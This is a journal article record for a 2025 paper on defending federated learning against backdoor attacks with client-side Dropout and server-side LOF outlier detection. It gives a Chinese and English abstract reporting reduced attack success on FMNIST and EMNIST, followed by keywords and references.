CAI Yu,CHEN Ding,WANG Juan,et al.LOF-based Defense Against Federated Learning Backdoor Attacks[J].Journal of Chengdu University of Information Technology,2025,40(04):454-458.[doi:10.16836/j.cnki.jcuit.2025.04.007]
基于LOF的联邦学习后门攻击防御方法
- Title:
- LOF-based Defense Against Federated Learning Backdoor Attacks
- 文章编号:
- 2096-1618(2025)04-0454-05
- Keywords:
- backdoor defense; federal learning; backdoor attack; Dropout; outlier detection
- 分类号:
- TP391
- 文献标志码:
- A
- 摘要:
- 针对联邦学习中出现后门攻击的问题,研究后门防御的不同方案,基于Dropout和LOF离群检测技术,提出客户端和服务器端相结合的综合防御方案。通过在客户端引入Dropout技术增强全局模型抵抗后门样本的能力,在服务器端结合LOF离群检测算法筛选可能存在的异常模型更新。实验结果表明,该方案在FMNIST数据集上,后门攻击成功率从88.11%降至1.62%。在EMNIST数据集上,后门攻击成功率从95.45%下降至0.25%。显著降低了后门攻击的成功率,后门防御效果良好。研究为构建更安全的联邦学习系统提供了可行的解决方案,平衡全局模型的性能和安全性,为联邦学习的广泛应用提供更可靠的保障。
- Abstract:
- Addressing the challenge of backdoor attacks in federated learning,diverse defense schemes are explored,leading to the proposition of a comprehensive strategy that integrates both client-side and server-side measures.This defense scheme was grounded in Dropout and LOF outlier detection techniques.The model’s resistance against backdoor samples was reinforced by implementing the Dropout technique on the client side,while the LOF outlier detection algorithm was employed on the server side to scrutinize potential abnormal model updates.Experimental results underscore the effectiveness of the proposed scheme,showcasing a substantial reduction in the Attack Success Rate(ASR)from 88.11% to 1.62% on the FMNIST dataset,and from 95.45% to merely 0.25% on the EMNIST dataset.The success rate of backdoor attacks is significantly curtailed,affirming the scheme’s robust backdoor defense capabilities.This research furnishes a viable solution for constructing a more secure federated learning system,harmonizing the global model’s performance and security.It provides a reliable foundation for the widespread adoption of federated learning.
参考文献/References:
[1] 林伟伟,石方,曾岚,等.联邦学习开源框架综述[J]. 计算机研究与发展,2023,60(7):1551-1580.
[2] 余晟兴,陈泽凯,陈钟,等.DAGUARD:联邦学习下的分布式后门攻击防御方案[J]. 通信学报,2023,44(5):110-122.
[3] Gao J,Zhang B,Guo X,et al.Secure partial aggregation:Making federated learning more robust for industry 4.0 applications[J]. IEEE Transactions on Industrial Informatics,2022,18(9):6340-6348.
[4] Fu S,Xie C,Li B,et al.Attack-resistant federated learning with residual-based reweighting[J]. arXiv preprint arXiv:1912.11464,2019.
[5] Liu G,Ma X,Yang Y,et al.Federaser:Enabling efficient client-level data removal from federated learning models[C]. 2021 IEEE/ACM 29th International Symposium on Quality of Service(IWQOS).IEEE,2021:1-10.
[6] 陈明鑫,张钧波,李天瑞.联邦学习攻防研究综述[J]. 计算机科学,2022,49(7):310-323.
[7] 高莹,陈晓峰,张一余,等.联邦学习系统攻击与防御技术研究综述[J]. 计算机学报,2023,46(9):1781-1805.
[8] Bagdasaryan E,Veit A,Hua Y,et al.How to backdoor federated learning[C]. International conference on artificial intelligence and statistics.PMLR,2020:2938-2948.
[9] Hinton G E,Srivastava N,Krizhevsky A,et al.Improving neural networks by preventing co-adaptation of feature detectors[J]. arXiv preprint arXiv:1207.0580,2012.
[10] Zhao Y,Xu K,Wang H,et al.Stability-based analysis and defense against backdoor attacks on edge computing services[J]. IEEE Network,2021,35(1):163-169.
[11] Breunig MM,Kriegel HP,Ng RT,et al.LOF:identifying density-based local outliers[C]. Proceedings of the 2000 ACM SIGMOD international conference on Management of data.2000:93-104.
[12] He K,Zhang X,Ren S,et al.Deep residual learning for image recognition[C]. Proceedings of the IEEE conference on computer vision and pattern recognition.2016:770-778.
[13] Xiao H,Rasul K,Vollgraf R.Fashion-mnist:a novel image dataset for benchmarking machine learning algorithms[J]. arXiv preprint arXiv:1708.07747,2017.
[14] Cohen G,Afshar S,Tapson J,et al.EMNIST:Extending MNIST to handwritten letters[C]. 2017 international joint conference on neural networks(IJCNN).IEEE,2017:2921-2926.
[15] Wang B,Yao Y,Shan S,et al.Neural cleanse:Identifying and mitigating backdoor attacks in neural networks[C]. 2019 IEEE Symposium on Security and Privacy(SP).IEEE,2019:707-723.
[16] Li Q,Diao Y,Chen Q,et al.Federated Learning on Non-IID Data Silos:An Experimental Study[J]. 2021.
[17] Sun Z,Kairouz P,Suresh A T,et al.Can you really backdoor federated learning?[J]. arXiv preprint arXiv:1911.07963,2019.
[18] Nguyen T D,Rieger P,De Viti R,et al.{FLAME}:Taming backdoors in federated learning[C]. 31st USENIX Security Symposium(USENIX Security 22).2022:1415-1432.
备注/Memo
收稿日期:2024-01-06
